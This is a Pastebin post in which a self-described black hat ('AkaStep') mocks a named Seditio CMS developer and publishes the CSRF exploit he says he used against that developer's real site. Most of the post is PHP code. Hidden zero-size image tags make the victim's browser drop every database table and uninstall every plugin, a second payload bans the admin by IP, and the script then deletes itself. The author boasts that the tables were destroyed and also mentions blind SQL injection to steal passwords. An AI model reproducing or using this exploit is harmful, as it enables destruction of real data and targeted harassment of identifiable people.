Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- I noticed that noob Kaan (unofficial seditio CMS "developer" from seditio-eklenti.com) always abuses my 0day's.
- This guy completely n00b.
- See this picture and you will understand.(See especially how this noob uses htmlspecialchars()) xD)
- http://s019.radikal.ru/i616/1206/47/cacfcceac4d8.png
- Doing that this guy thinks he fixed vulns lol
- Do you know what is funny?))
- This guy just adds @$var (aka suppress) and thinks sql injection fixed )))))) Bohaha)))
- I thought it's really right time to Pwn this guy.Theris no place for noobs like Kaan.
- And somehow his database tables dropped)) Any backups noob?
- What do you think now? It isn't vuln?:)))
- http://packetstormsecurity.org/files/111684/Seditio-165-Cross-Site-Request-Forgery-Backup-Disclosure.html
- or this one:
- http://packetstormsecurity.org/files/111878/Seditio-165-SQL-Injection-Denial-Of-Service.html
- (Baby i'm using it for extract passwords in blind manner.Dut it is not for scriptkiddies)
- Sended payload to this guy:
- http://s004.radikal.ru/i208/1206/66/10557bb66505.png
- <?php
- error_reporting('off');
- echo '
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0"></img>
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
- <img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
- ';
- /*
- Ban Admin CSRF exploit
- 4 Fun
- tested under seditio 165.x from seditio-eklenti.com/ seditio-build170.20120302 from neocrome.net
- OS: Windows XP SP2 (32 bit)
- Apache: 2.2.21.0
- PHP Version: 5.2.17.17
- mysql> select version()
- -> ;
- +-----------+
- | version() |
- +-----------+
- | 5.5.21 |
- +-----------+
- */
- $site='http://seditio-eklenti.com';// define your target site here.
- $funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here
- die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
- . '&a=confirmed" width="0" height="0" />'. PHP_EOL .
- '<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
- . '&a=confirmed" width="0" height="0" />' .
- '<h1>' . strrev($funmsg) . '</h1>');
- unlink(__FILE__);
- ?>
- And obviously database tables dropped:
- http://s019.radikal.ru/i623/1206/61/8a6bc9a41003.png
- @2 ALL NORMAL peoples: ****Do not use any SHIT from seditio-eklenti.com*****
- Otherwise you will be Pwned ASAP.
- P.S Gotune qoyaram o kesin ki,arxamca artiq eksik nese danissin!
- Gelirem o biri arxamca palaskat eden varyoxsauzlarin varini yoxunu sikmeye!
- /AkaStep
- Respect to All Black HatZ and to all brothers!
- 1338581128
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement